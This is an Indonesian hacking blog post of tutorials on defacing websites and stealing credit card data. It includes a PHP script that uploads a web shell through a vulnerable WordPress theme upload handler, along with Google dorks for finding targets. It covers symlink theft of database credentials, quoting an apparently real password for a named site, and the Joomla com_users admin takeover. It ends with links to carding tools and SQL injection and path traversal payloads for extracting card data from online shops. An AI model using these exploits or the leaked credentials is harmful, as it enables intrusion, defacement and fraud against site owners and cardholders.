Kamis, 27 Februari 2014

Deface Dengan Exploit Orange Themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D




10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

DEFACE MENGGUNAKAN SYMLINK

Kali ini saya akan berbagi cara menggunakan Symlink..
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target..saya tidak akan menjelaskan caranya...


Pertama masuk ke Shell yang sudah di tanam di web target...
lalu upload Sym.php kalo belum punya silahkan Download DISINI






pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam...
Selanjutnya akses / buka symlink yang telah agan upload...




lalu klik user & domain & symlink




terluhat banyak sekali target2 lain...dan yang akan saya jadikan target adalah thefussyeater.org lalu klik Symlink....




lalu kita cari confignya...dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik...
jika d joomla cari saja configuration.php ..




define('DB_HOST', 'localhost');
DB NAME = thefussy_wrdp3
DB USER = thefussy_wrdp3
DB PASSWORD = CZyLRz1EuwSd
DB HOST = localhost
Lalu setelah mendapatkan informasi mysql kembali ke shell pertama....






Klik koneksi MySQL.. 



lalu saya isi dengan data2 di atas...dan saya klik Connect
jika d dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login...





saya klik wp_user






terlihat passwordnya dalam bentuk hash..jadi kita rubah saja...agan buat password dalam bentuk MD5 di
http://md5encryption.com/
saya mencoba password 121212 dan setelah d enskripsi menjadi 93279e3308bdbbeed946fc965017f67a lalu saya rubah






saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya confirm untuk menyimpan pengaturannya...
berarti saya akan login dengan username admin dan password 121212..






saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin
saya login...
dan berhasil masuk :)





Jika sudah seperti ini ya terserah..
mau di pasang Backdoor lagi dan de deface seperti http://thefussyeater.org/ jg terserah :P dosa tanggung sendiri...
saran saya sih kl webshop mending cari CC atau Paypal...
walaupun cm dapet paypal isinya $5 lumayan nunggu dia isi aja dari pada d deface hahahaha.....
Jika ada yang belum tau cara pasang Backdoor/shell di Wordpress tunggu postingan berikutnya , Insya Allah...
Selamat Mencoba...

Deface Dengan Metode Com_User

Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia. Com_User / Teknik Exploit joomla! ini dapat di gunakan untuk CMS Joomla! yang menggunakan joomla! versi 1.6.x. / 1.7.x. / 2.5.x.




Apa sih CMS Joomla itu?

Joomla! adalah Sistem manajemen konten (SMK atau CMS) yang bebas dan terbuka (free opensource) ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet. Joomla pertamakali dirilis dengan versi 1.0.0. Fitur-fitur Joomla! diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll. Joomla! menggunakan lisensi GPL.
Asal kata Joomla sendiri berasal dari kata Swahili jumla yang mengandung arti "kebersamaan".
(dikutip dari wikipedia.org)

Yang anda butuhkan:
1. Exploit Joomla (download disini)

Langkah-Langkah:

1. Cari web target dengan menggunakan mesin pencari dengan "dork" yang ada dibawah ini.
Klik untuk membuka: Google Dork Com_User

2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak

3. Cari web yang vuln.
*Penjelasan: Vuln = Vulnerability = Mempunyai kelemahan. Sehingga web yang dikatakan vuln berarti bisa untuk kita Deface.


Gambar diatas merupakan site "Vuln" alias menggunakan CMS Joomla Versi 1.7.X


Gambar diatas merupakan site "Joomla versi 1.6.x / 2.5.x".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.


6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.


7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 


8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 

contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertamayang terdapat di tempat paling atas.

*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda


10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.


13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/joomla/administrator

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

CARDING TOOLS

Beberapa Software Carding :

1. Credit Card Generator : http://adfoc.us/13835924157240
2. CChecker : http://adfoc.us/13835925243361
3. CVV2 Retriever : http://adfoc.us/13835925243462
4.  Credit Card Manager 2010 : http://adfoc.us/13835925243542
5. Credit Card Check Tool : http://adfoc.us/13835925243619
6. PayPal Brute Forcer : http://adfoc.us/13835925243772

FULL TUTORIAL CARDING

Carding merupakan salah satu kejahatan di internet yang berupa penipuan dalam proses perbelanjaan, yaitu dengan berbelanja mengguakan nomor dan identitas kartu kredit orang lain yang diperoleh secara illegal dan biasanya dengan mencuri data di internet. Sasaran yang dituju oleh carder (sebutan bagi para penipu di internet) adalah website berbasis E-commerce yang memungkinkan data basenya menyimpan puluhan bahkan ratusan kartu kredit, paypal atau data nasabah bank. Terdapat banyak karakteristik kejahatan carding yang terjadi, di antaranya adalah :

  1. Minimized Physical Contact (tidak adanya kontak secara fisik)
    System modus ini adalah carder  tidak perlu mencuri kartu kredit secara fisik, tapi cukup  dengan mengetahui nomornya, pelaku sudah bisa melakukan aksinya.
  2. Non violance (tanpa kekerasan)
    Pelaku tidak melakukan kekerasan secara fisik seperti  ancaman yang menimbulkan ketakutan sehinga korban memberikan harta bendanya.
  3. Global karena kejahatan ini terjadi lintas negara yang mengabaikan batas-batas geografis dan waktu.
  4. High Technology
    Sarana yang digunakan dalam kejahatan tersebut menggunakan peralatan berteknologi yang berupa jaringan internet.
Proses pertama yang dilakukan seorang carder adalah dengan Mendapatkan nomor kartu kredit yang bisa dilakukan dengan berbagai cara antara lain: phising (membuat situs palsu seperti dalam kasus situs klik.bca), hacking, sniffing, keylogging, worm, chatting dengan merayu dan tanpa sadar memberikan nomor kartu kredit secara sukarela, berbagi informasi antara carder, mengunjungi situs yang memang spesial menyediakan nomor-nomor kartu kredit buat carding dan lain-lain. Setelah itu Mengunjungi situs-situs online yang banyak tersedia di internet seperti Ebay, Amazonuntuk kemudian carder mencoba-coba nomor yang dimilikinya untuk mengetahui apakah kartu tersebut masih valid atau limitnya mencukupi. Lalu melakukan transaksi secara online untuk membeli barang seolah-olah carder adalah pemilik asli dari kartu tersebut dan Menentukan alamat tujuan atau pengiriman, sebagaimana kita ketahui bahwa Indonesia dengan tingkat penetrasi pengguna internet di bawah 10 %, namun menurut survei AC Nielsen tahun 2001 menduduki peringkat keenam dunia dan keempat di Asia untuk sumber para pelaku kejahatan carding. Hingga akhirnya Indonesia di-blacklist oleh banyak situs-situs online sebagai negara tujuan pengiriman. Oleh karena itu, para carder asal Indonesia yang banyak tersebar di Jogja, Bali, Bandung dan Jakarta umumnya menggunakan alamat di Singapura atau Malaysia sebagai alamat antara dimana di negara tersebut mereka sudah mempunyai rekanan, maka carder langsung dapat mengambil barang tersebut.

Dan untuk menangani hal-hal tersebut  polri telah menyikapinya dengan membentuk suatu satuan khusus di tingkat Mabes Polri yang dinamakan Direktorat Cyber Crime. Di awali oleh personil terlatih untuk menangani kasus-kasus semacam ini, tidak hanya dalam teknik penyelidikan dan penyidikan, tapi juga mereka menguasai teknik khusus untuk pengamanan dan penyitaan bukti-bukti secara elektronik. Mengingat dana yang terbatas karena mahalnya peralatan dan biaya pelatihan personil, maka apabila terjadi kejahatan di daerah, maka Mabes Polri akan menurunkan tim ke daerah untuk memberikan asistensi. Dan secara detil dapat saya kutip isi pasal tersebut yang menerangkan tentang perbuatan yang dianggap melawan hukum menurut UU ITE berupa illegal access:
Pasal 31 ayat 1: “Setiap orang dengan sengaja dan tanpa hak atau melawan hukum melakukan intersepsi atau penyadapan atas informasi elektronika dan atau dokumen elektronik dalam suatu komputer dan atau sistem elektronik secara tertentu milik orang lain.”
Pasal 31 ayat 2: “Setiap orang dengan sengaja atau tanpa hak atau melawan hukum melakukan intersepsi atau transmisi elktronik dan atau dokumen elektronik yang tidak bersidat publik dari, ke dan di dalam suatu komputer dan atau sistem elektronik tertentu milik orang lain, baik yang tidak menyebabkan perubahan, penghilangan dan atau penghentian informasi elektronik dan atau dokumen elektronik yang ditransmisikan.” . semoga langkah awal dari pengamanan ini mampu mencegah kejahatan-kejahatan yang terus meningkat. Amienn ………!



Carding Bagian 1

ini adalah tutor lama, tapi mungkin saja
masih bisa membantu temen² seperti saia
yang baru belajar.....
Contoh bugs pada bentuk toko system :
shopadmin

Ketik keyword google :
allinurl:/shopadmin.asp
Contoh target : http://www.Target.com/shopadmin.asp
user : 'or'1
pass : 'or'1
Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google :
allinurl:/store/index.cgi/page=
Contoh target:
http://www.Target.com/cgi-bin/store/inde...e=short_bl ue.htm
Hapus short_blue.htm dan gantidengan
:./admin/files/order.log
Hasilnya:www.Target.c om/cgi-bin/store/index.cgi?page=../admin/files/order... log

Contoh bugs pada bentuk toko sistem :
metacart
Ketik keyword google.com :
allinurl:/metacart/

Contoh target :
http://www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan :
--> /database/metacart.mdb
Hasilnya:
/www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem :DCShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : http://www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
Hasilnya:
http://www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : http://www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan :
/cg-bin/eshop/database/order.mdb

Hasilnya:
http://www.Target.com/.../cg-bin/eshop/d.../order.mdb
Download file *.mdb nya dan Buka file
tsb pakai Microsoft Acces

Carding Bagian 2

masih lanjutan tutor yang sebelumnya.
tetep tutor lama. maklum aja saia kan
newbie..jadi adanya tutor lama.
tapi dengan segala keterbatasan saia,
itu tidak membuat saia berdiam diri dan
tidak berbagi. ya kan??...walaupun
sedikit yang penting berbagi
Contoh bugs pada bentuk toko sistem :
PDshopro
Ketik keyword google.com :
allinurl:/shop/category.asp/catid=
Contoh :
http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx
dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati
file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan
merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces
Contoh bugs pada bentuk toko sistem :
commerceSQL
Ketik keyword google.com :
allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti
dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya:
http://www.Target.com/cgi-bin/commercesq....cgi?page=
Untuk melihat adminconfig
http://www.Target.com/cgi-bin/commercesql/index.cgi?pa ge=../admin/admin_conf.pl
Untuk melihat adminmanager
http://www.Target.com/cgi-bin/commercesql/index.cgi?p age=../admin/manager.cgi
Untuk melihat filelog/CCnya
http://www.Target.com/cgi-bin/commercesql/index.cgi ?page=../admin/files/order.log
Contoh bugs pada bentuk toko sistem :
Cart32 v3.5a
Ketik keyword google.com :
allinurl:/cart32.exe/
Contoh:
http://www.Target.net/wrburns_s/cgi-bin/...e/NoItemFo und
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg
keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di
bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and
Directory Kalau dibagian
tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb.
terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau
semuanya ke notepad atau
program text editor lainnya.
Ganti string url tsb. menjadi seperti
ini :http://www.
Target.net/wrburns_s/cgi-bin/cart32/
Nah. ., paste satu per satu, file .c32 ke
akhir url yg sudah
dimodifikasi tadi, denganformat
http://www.Target.com/cart32/
Contoh
http://w ww.Target.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c 32
Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com :
allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string
berikut di akhir bagian
shopdisplayproducts.asp
Contoh:
http://Target.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%2 0tbluser%20where%20fldusername='admin'%20and%20fldpassw ord%20like%20'a%25'--

Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan
informasi username dan password admin
Untuk login admin ke
http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik -->
allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin
baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into
tbluser (fldusername)values
('')--&SubCategory=&hide=&action.x=46&action.y= 6
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Keyword=&category=3); update tbluser set
fldaccess='1'where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Jangan lupa untuk mengganti dan nya
terserah kamu.
Untuk mengganti password admin, masukkan
keyword berikut :
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername='admin'--&SubCategory=All&action.x=3 3&action.y=6
Untuk login admin, ada di
http://Target/vpasp/shopadmin.asp

Carding Bagian 3



tetep tutor lama dari seorang
pemula..huekekekekeke. maaf yak kalo ada
yang salah. mohon dikoreksi kembali


Contoh bugs pada bentuk toko sistem :
Lobby.asp
Ketik keyword google.com : allinurl:
Lobby.asp
Contoh : http://www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti
dengan : fpdb/shop.mdb
Hasilnya : http://www.Target.com/fpdb/shop.mdb


Contoh bugs pada bentuk toko sistem :
Shopper.cgi
Ketik keyword google.com : allinurl:
/cgi-local/shopper.cgi
Contoh:
http://www.Target.com/cgi-local/shopper....dd=action& key=
Tambah dengan :...&template=order.log
Hasilnya:
http://www.xxxxxxxx.com/cgi-local/shoppe...add=action &key=...&template=order.log


Contoh bugs pada bentuk toko sistem
:Proddetail.asp
Ketik keyword google.com :
allinurl:proddetail.asp?prod=
Contoh:
http://www.Target.org/proddetail.asp?pro...SledRaffle
H apus tulisan proddtail.asp?prod=SG369
dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya :
http://www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem
:Digishop
Ketik keyword google.com :
inurl:"/cart.php?m="
Contoh :
http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan -->admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake
statment SQL injection
Usename : 'or"="
Password : 'or"="
setelah bisa login, cari data yang
diperlukan .

Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google.com :
allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example:
http://www.target.com/cgi-bin/store/...ir_Manuals.ht m
masukin bugsnya:
http://www.target.com/cgi-bin/store/...iles/order.lo g
trus copy-paste tuch log'nya di notepad
biar gampang di baca


Contoh bugs pada bentuk toko sistem :
Index Cart
Ketik keyword google.com :
inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya :'or"="

contoh target buat kalian :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :
Index cart
Ketik keyword google.com : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya
ama admin/scart.mdb


example LIVE TARGET EDITED
Injection : selanjutnya masukin bugs di
atas jadi : LIVE TARGET EDITED
kalo berhasil loe dapet file
beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com :
/shop/category.asp/catid=
Bugs : hapus tulisan
/shop/category.asp?catid=2 ganti dengan
/admin/dbsetup.asp


example : LIVE TARGET EDITED
masukin bugs menjadi : LIVE TARGET EDITED
kalo berhasil dapet file.mdb trus buka
pake MS - Access


ontoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com :
inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan
proddetail.asp?prod= dengan
fpdb/vsproducts.mdb
Example : LIVE TARGET EDITED
masukin bugsnya LIVE TARGET EDITED
download file .mdbnya trus buka pake MS-
ACCESS..
Contoh bugs pada bentuk toko sistem :
Sunshop
Ketik keyword google.com : "Powered by
SunShop 3.2"
Atau google dork :
inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik
"OK" aja
Contoh buat kalian : LIVE TARGET EDITED
ganti dengan admin http LIVE TARGET EDITED
Login pake SQL Injection :
Username : admin
Password :'or''='


Contoh bugs pada bentuk toko sistem :
digishop
Ketik keyword google.com
Ketik keyword google.com : "Powered by
Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan
admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="


Contoh target :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com :
inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp
dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search
our Inventory


jadi LIVE TARGET EDITED
dapat dech .mdb ===> trus klik open
database JANGAN klik "convert
databese" ===> klk view orders ====>
trus cari orang yg pernah
belanja contoh pada customer no 36 trus
dimana no CCnya badKiddes....
sabar bro... masih di table customer no
36 then klikpayment

Postingan Lebih Baru Postingan Lama Beranda